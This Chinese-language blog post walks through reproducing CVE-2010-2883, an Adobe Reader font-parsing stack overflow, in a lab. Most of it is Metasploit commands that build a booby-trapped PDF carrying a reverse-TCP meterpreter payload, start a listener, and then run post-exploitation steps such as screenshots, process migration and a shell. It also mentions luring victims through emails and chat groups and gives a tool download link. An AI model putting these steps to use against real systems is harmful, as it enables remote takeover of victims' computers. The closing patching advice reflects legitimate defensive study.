[漏洞复现] CVE-2010-2883 Adobe Reader 打开pdf即刻中招

Posted 2020-10-29

1、漏洞概述

在“漏洞界”，据称有两种大山是其他软件永远无法匹敌的，一个是Microsoft的Office套件，一个是Adobe的全家桶。这两家出的漏洞，无论在出洞频率、攻击危害性、或者是影响范围等多个维度来看，都直接将其他软件远远甩开。如果要较真起来，到底谁是“漏洞之王”？

相信Adobe一定能“摘得桂冠”。

Adobe全家桶里面的Adobe Flash Player、Adobe Reader、Adobe Acrobat等产品，可以说是“难兄难弟”了，每年都会贡献一大堆漏洞。很多人就会问，为什么就他们家的产品漏洞最多，别人家的呢？

其实，所有软件都或多或少有漏洞，没有绝对安全的软件，就看有没有人去挖掘而已。

Adobe系列因为桌面安装量非常庞大，而且官方似乎安全开发工作这块做的不是太好，大量的黑客或安全研究人员愿意投入更多的时间来“挖洞”，一个成熟可利用的Adobe 0day漏洞，价值连城毫不夸张。

这不，2018年2月份，Adobe Flash最新版就爆出CVE-2018-4878 高危漏洞，可导致电脑直接被getshell。而同一月份，思科旗下安全团队TALOS披露了Adobe Reader最新版存在远程代码执行漏洞（CVE-2018-4901），简单来说，“打开PDF文件可能导致被getshell”。目前，Adobe已经发布了针对此漏洞的安全补丁。

由于Adobe Reader CVE-2018-4901 暂时还没有成熟可用的渗透代码流传出来，所以目前并没有像Adobe Flash CVE-2018-4878 引起更广泛的关注。

但是，我们要注意一点的是，此时此刻，必定有很多黑客正在尝试写攻击代码，准备发起新一轮攻击。

虽然我们没法直接对最新CVE-2018-4901进行复现，但从学习的角度，可以拿一个非常经典的老漏洞 CVE-2010-2883 来进行实践。这枚漏洞年限已久，但可以直接做出“打开pdf即刻中招”的效果，可以说是“简单暴力”的典范了。

CVE-2010-2883漏洞原理：“Adobe Reader在处理CoolType字体文件的sing表时，存在栈溢出漏洞，当打开特制的恶意PDF文件时，可允许任意代码远程执行。”

影响版本：Adobe Reader 8.2.4 - 9.3.4

目前，Kali Linux Metasploit已经集成了相关的漏洞利用代码，我们可以用较快的速度，对此漏洞进行复现。

2、漏洞复现环境

Kali Linux + Windows 7 sp1 
渗透机：Kali Linux （ip：172.16.70.216） 
靶机：Windows 7 sp1 （ip：172.16.70.199） 
软件：Adobe Reader 9.3.exe

注：此实验环境所用渗透机和靶机，跟之前文章所分享一致。为了节省大家实验时间，我将此实验涉及到的工具全部上传到网盘=> 
链接: https://pan.baidu.com/s/1585jIDZgRh7IzwE01dK-Bw 密码:ie8m

3、实验流程

①进入Kali Linux，使用Metasploit生成PDF木马文件

搜索Adobe渗透模块 
msf > search adobe_cooltype_sing 
调用渗透模块 
msf > use exploit/windows/fileformat/adobe_cooltype_sing/ 
查看模块详情 
msf exploit(adobe_cooltype_sing) > info

调用meterpreter载荷，反向连接到渗透机 
msf  exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp 
设置Kali Linux的IP地址 
msf  exploit(adobe_cooltype_sing) > set LHOST 172.16.70.216 
设置本地监听端口 
msf  exploit(adobe_cooltype_sing) > set LPORT 8888 
设置带有后门程序的PDF文件 
msf  exploit(adobe_cooltype_sing) > set FILENAME PINGINGLAB.pdf 
执行渗透生成文件 
msf  exploit(adobe_cooltype_sing) > exploit 

②将PDF木马文件拷贝至Kali Linux桌面

[email protected]:~# cp /root/.msf4/local/PINGINGLAB.pdf /root/Desktop/PINGINGLAB.pdf 

③Metasploit开启shell监听会话，等待肉鸡上线

使用handler监听模块 
msf > use exploit/multi/handler 
回弹一个tcp连接 
msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp 
设置监听IP地址（跟PDF木马文件一致） 
msf  exploit(handler) > set LHOST 172.16.70.216 
设置监听的端口（跟PDF木马文件一致） 
msf  exploit(handler) > set LPORT 8888 
开启监听 
msf  exploit(handler) > exploit 

④在Windows 7安装Adobe Reader 9.3

⑤将PDF木马文件拷贝到Windows 7并打开

⑥Metasploit获取shell会话，并用Meterpreter控制肉鸡

查看系统信息 
meterpreter > sysinfo 
查看当前用户 
meterpreter > getuid 
截屏 
meterpreter > screenshot

获取进程 
meterpreter > ps 
切换进程（考虑到这个漏洞利用过程，adobe reader会“卡壳”退出，所以需要快速切换到其他系统进程，这样会话才不会失效） 
meterpreter > migrate 3748 

获取Dos Shell 
meterpreter > shell 
C:\Windows\system32>ipconfig 

实验总结： 
可以看到，最终由于Adobe Reader 存在CVE-2010-2883这个高危漏洞，导致电脑打开特殊定制的pdf之后，直接变成肉鸡。与之前文章中的Office和Flash 0day漏洞类似，真实环境下，很多黑客会利用此方法，结合社会工程学，例如通过诱导邮件、各种论坛、QQ群、微信群等多渠道，诱导用户下载并打开，而只要打开的用户，就直接中招。

在这里也呼吁大家：平常要非常小心陌生办公文件，无论是pdf还是word等，打开之前一定要明确来源，或者用杀毒软件先杀毒，再打开。另外，就是尽量保证电脑的软件处于最新版，这样才能最大程度降低被攻击的几率。

4、漏洞修复

①直接到Adobe官网，下载Adobe Reader最新版本； 
②安装常见杀毒软件，开启实时防护和杀毒引擎实时升级。

---

相关推文：

[漏洞复现] MS17-010 基于"永恒之蓝"实现Windows Getshell

[漏洞复现] CVE-2017-11882 通杀所有Office版本

[漏洞复现] CVE-2017-16995 Ubuntu16.04